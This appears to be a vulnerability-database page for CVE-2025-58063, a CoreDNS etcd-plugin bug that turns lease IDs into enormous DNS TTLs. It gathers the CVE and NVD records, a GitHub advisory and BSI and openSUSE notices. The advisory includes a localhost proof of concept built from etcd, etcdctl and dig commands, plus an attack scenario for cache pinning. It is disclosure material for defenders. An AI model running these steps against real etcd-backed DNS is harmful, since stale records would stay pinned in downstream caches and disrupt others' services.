Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-58063 (GCVE-0-2025-58063)
Vulnerability from cvelistv5 – Published: 2025-09-09 19:27 – Updated: 2025-09-10 14:26
VLAI?
EPSS
Title
CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion
Summary
CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.
Severity ?
7.1 (High)
CWE
- CWE-681 - Incorrect Conversion between Numeric Types
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-58063",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-10T14:26:10.971285Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-10T14:26:13.850Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coredns",
"vendor": "coredns",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.2.0, \u003c 1.12.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-681",
"description": "CWE-681: Incorrect Conversion between Numeric Types",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-09T19:27:18.124Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"name": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
}
],
"source": {
"advisory": "GHSA-93mf-426m-g6x9",
"discovery": "UNKNOWN"
},
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-58063",
"datePublished": "2025-09-09T19:27:18.124Z",
"dateReserved": "2025-08-22T14:30:32.222Z",
"dateUpdated": "2025-09-10T14:26:13.850Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-58063\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-09-09T20:15:48.057\",\"lastModified\":\"2025-09-11T17:14:25.240\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-681\"}]}],\"references\":[{\"url\":\"https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-58063\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-09-10T14:26:10.971285Z\"}}}], \"references\": [{\"url\": \"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-09-10T14:26:02.976Z\"}}], \"cna\": {\"title\": \"CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion\", \"source\": {\"advisory\": \"GHSA-93mf-426m-g6x9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"coredns\", \"product\": \"coredns\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.2.0, \u003c 1.12.4\"}]}], \"references\": [{\"url\": \"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\", \"name\": \"https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf\", \"name\": \"https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-681\", \"description\": \"CWE-681: Incorrect Conversion between Numeric Types\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-09-09T19:27:18.124Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-58063\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-10T14:26:13.850Z\", \"dateReserved\": \"2025-08-22T14:30:32.222Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-09-09T19:27:18.124Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2025-58063
Vulnerability from fkie_nvd - Published: 2025-09-09 20:15 - Updated: 2025-09-11 17:14
Severity ?
Summary
CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue."
}
],
"id": "CVE-2025-58063",
"lastModified": "2025-09-11T17:14:25.240",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-09-09T20:15:48.057",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-681"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-93MF-426M-G6X9
Vulnerability from github – Published: 2025-09-09 19:19 – Updated: 2025-09-10 21:07
VLAI?
Summary
CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion
Details
Summary
The CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.
Details
In plugin/etcd/etcd.go, the TTL() function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:
func (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {
etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration
// ... rest of function uses etcdTTL as actual TTL
}
Lease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.
This enables cache pinning attacks, such as:
- Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).
- Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).
- CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.
- Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.
Some resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.
PoC
- Launch etcd:
etcd \
--data-dir ./etcd-data \
--listen-client-urls http://127.0.0.1:2379 \
--advertise-client-urls http://127.0.0.1:2379 \
--listen-peer-urls http://127.0.0.1:2380 \
--initial-advertise-peer-urls http://127.0.0.1:2380 \
--initial-cluster default=http://127.0.0.1:2380 \
--name default \
--initial-cluster-token etcd-ttl-poc \
--initial-cluster-state new &
- Prepare CoreDNS configuration:
cat > Corefile << 'EOF'
skydns.local {
etcd {
path /skydns
endpoint http://localhost:2379
debug
}
log
errors
}
EOF
- Launch CoreDNS:
coredns -conf Corefile -dns.port=1053
- Create an etcd record called
large-lease-servicewith a lease grant of 1 hour:
LEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk '{print $2}')
etcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service '{
"host": "192.168.1.101",
"port": 8080
}' --lease=$LEASE_ID
- Verify the lease details:
$ etcdctl lease timetolive $LEASE_ID
lease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)
- Query the DNS record and observe the record TTL at 28 years:
$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A
large-lease-service.skydns.local. 901209123 IN A 192.168.1.101
Impact
Affects any CoreDNS deployment using the etcd plugin for service discovery.
- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.
- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)
- Confidentiality: None.
The bug was introduced in #1702 as part of the CoreDNS v1.2.0 release.
Mitigation
The TTL function should utilise etcd's Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.
Credit
Thanks to @thevilledev for disclovering this vulnerability and contributing a fix.
For more information
Please consult our security guide for more information regarding our security process.
Severity ?
7.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.12.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58063"
],
"database_specific": {
"cwe_ids": [
"CWE-681"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-09T19:19:33Z",
"nvd_published_at": "2025-09-09T20:15:48Z",
"severity": "HIGH"
},
"details": "# Summary\n\nThe CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.\n\n# Details\n\nIn `plugin/etcd/etcd.go`, the `TTL()` function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:\n\n```go\nfunc (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {\n etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration\n // ... rest of function uses etcdTTL as actual TTL\n}\n```\n\nLease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.\n\nThis enables cache pinning attacks, such as:\n\n1. Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).\n2. Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).\n4. CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.\n5. Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.\n\nSome resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.\n\n# PoC\n\n1. Launch etcd:\n\n```bash\netcd \\\n --data-dir ./etcd-data \\\n --listen-client-urls http://127.0.0.1:2379 \\\n --advertise-client-urls http://127.0.0.1:2379 \\\n --listen-peer-urls http://127.0.0.1:2380 \\\n --initial-advertise-peer-urls http://127.0.0.1:2380 \\\n --initial-cluster default=http://127.0.0.1:2380 \\\n --name default \\\n --initial-cluster-token etcd-ttl-poc \\\n --initial-cluster-state new \u0026\n```\n\n2. Prepare CoreDNS configuration:\n\n```bash\ncat \u003e Corefile \u003c\u003c \u0027EOF\u0027\nskydns.local {\n etcd {\n path /skydns\n endpoint http://localhost:2379\n debug\n }\n log\n errors\n}\nEOF\n```\n\n3. Launch CoreDNS:\n\n```bash\ncoredns -conf Corefile -dns.port=1053\n```\n\n4. Create an etcd record called `large-lease-service` with a lease grant of 1 hour:\n\n```bash\nLEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk \u0027{print $2}\u0027)\n\netcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service \u0027{\n \"host\": \"192.168.1.101\",\n \"port\": 8080\n}\u0027 --lease=$LEASE_ID\n```\n\n7. Verify the lease details:\n\n```bash\n$ etcdctl lease timetolive $LEASE_ID\nlease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)\n```\n\n8. Query the DNS record and observe the record TTL at 28 years:\n\n```bash\n$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A\nlarge-lease-service.skydns.local. 901209123 IN A 192.168.1.101\n```\n\n# Impact\n\nAffects any CoreDNS deployment using the etcd plugin for service discovery.\n\n- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.\n- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)\n- Confidentiality: None.\n\nThe bug was introduced in #1702 as part of the CoreDNS [v1.2.0 release](https://github.com/coredns/coredns/releases/tag/v1.2.0).\n\n# Mitigation\n\nThe TTL function should utilise etcd\u0027s Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.\n\n# Credit\n\nThanks to [@thevilledev](https://github.com/thevilledev) for disclovering this vulnerability and contributing a fix.\n\n# For more information\n\nPlease consult our [security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.",
"id": "GHSA-93mf-426m-g6x9",
"modified": "2025-09-10T21:07:40Z",
"published": "2025-09-09T19:19:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
WID-SEC-W-2025-2014
Vulnerability from csaf_certbund - Published: 2025-09-09 22:00 - Updated: 2025-10-19 22:00Summary
CoreDNS: Schwachstelle ermöglicht Denial of Service
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung
CoreDNS ist ein DNS server.
Angriff
Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in CoreDNS ausnutzen, um einen Denial of Service Angriff durchzuführen.
Betroffene Betriebssysteme
- Linux
- UNIX
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "CoreDNS ist ein DNS server.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in CoreDNS ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux\n- UNIX",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2025-2014 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2025/wid-sec-w-2025-2014.json"
},
{
"category": "self",
"summary": "WID-SEC-2025-2014 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2014"
},
{
"category": "external",
"summary": "GitHub Security Advisory GHSA-93mf-426m-g6x9 vom 2025-09-09",
"url": "https://github.com/advisories/GHSA-93mf-426m-g6x9"
},
{
"category": "external",
"summary": "Red Hat Bugtracker #2394215 vom 2025-09-09",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394215"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2025:0400-1 vom 2025-10-19",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/H5D23KWHAXUQPFJVFY63Q4EOLEB65YNP/"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2025:0401-1 vom 2025-10-19",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/D3NFSK4KJNQCOLXRSOYRTZKZ27KWRYWC/"
}
],
"source_lang": "en-US",
"title": "CoreDNS: Schwachstelle erm\u00f6glicht Denial of Service",
"tracking": {
"current_release_date": "2025-10-19T22:00:00.000+00:00",
"generator": {
"date": "2025-10-20T08:28:53.629+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.4.0"
}
},
"id": "WID-SEC-W-2025-2014",
"initial_release_date": "2025-09-09T22:00:00.000+00:00",
"revision_history": [
{
"date": "2025-09-09T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2025-10-19T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von openSUSE aufgenommen"
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "\u003c1.12.4",
"product": {
"name": "Open Source CoreDNS \u003c1.12.4",
"product_id": "T046853"
}
},
{
"category": "product_version",
"name": "1.12.4",
"product": {
"name": "Open Source CoreDNS 1.12.4",
"product_id": "T046853-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:coredns:coredns:1.12.4"
}
}
}
],
"category": "product_name",
"name": "CoreDNS"
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58063",
"product_status": {
"known_affected": [
"T046853",
"T027843"
]
},
"release_date": "2025-09-09T22:00:00.000+00:00",
"title": "CVE-2025-58063"
}
]
}
OPENSUSE-SU-2025:15561-1
Vulnerability from csaf_opensuse - Published: 2025-09-18 00:00 - Updated: 2025-09-18 00:00Summary
coredns-1.12.4-2.1 on GA media
Notes
Title of the patch
coredns-1.12.4-2.1 on GA media
Description of the patch
These are all security issues fixed in the coredns-1.12.4-2.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15561
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "coredns-1.12.4-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the coredns-1.12.4-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15561",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15561-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-58063 page",
"url": "https://www.suse.com/security/cve/CVE-2025-58063/"
}
],
"title": "coredns-1.12.4-2.1 on GA media",
"tracking": {
"current_release_date": "2025-09-18T00:00:00Z",
"generator": {
"date": "2025-09-18T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15561-1",
"initial_release_date": "2025-09-18T00:00:00Z",
"revision_history": [
{
"date": "2025-09-18T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.aarch64",
"product": {
"name": "coredns-1.12.4-2.1.aarch64",
"product_id": "coredns-1.12.4-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.aarch64",
"product": {
"name": "coredns-extras-1.12.4-2.1.aarch64",
"product_id": "coredns-extras-1.12.4-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.ppc64le",
"product": {
"name": "coredns-1.12.4-2.1.ppc64le",
"product_id": "coredns-1.12.4-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.ppc64le",
"product": {
"name": "coredns-extras-1.12.4-2.1.ppc64le",
"product_id": "coredns-extras-1.12.4-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.s390x",
"product": {
"name": "coredns-1.12.4-2.1.s390x",
"product_id": "coredns-1.12.4-2.1.s390x"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.s390x",
"product": {
"name": "coredns-extras-1.12.4-2.1.s390x",
"product_id": "coredns-extras-1.12.4-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.x86_64",
"product": {
"name": "coredns-1.12.4-2.1.x86_64",
"product_id": "coredns-1.12.4-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.x86_64",
"product": {
"name": "coredns-extras-1.12.4-2.1.x86_64",
"product_id": "coredns-extras-1.12.4-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
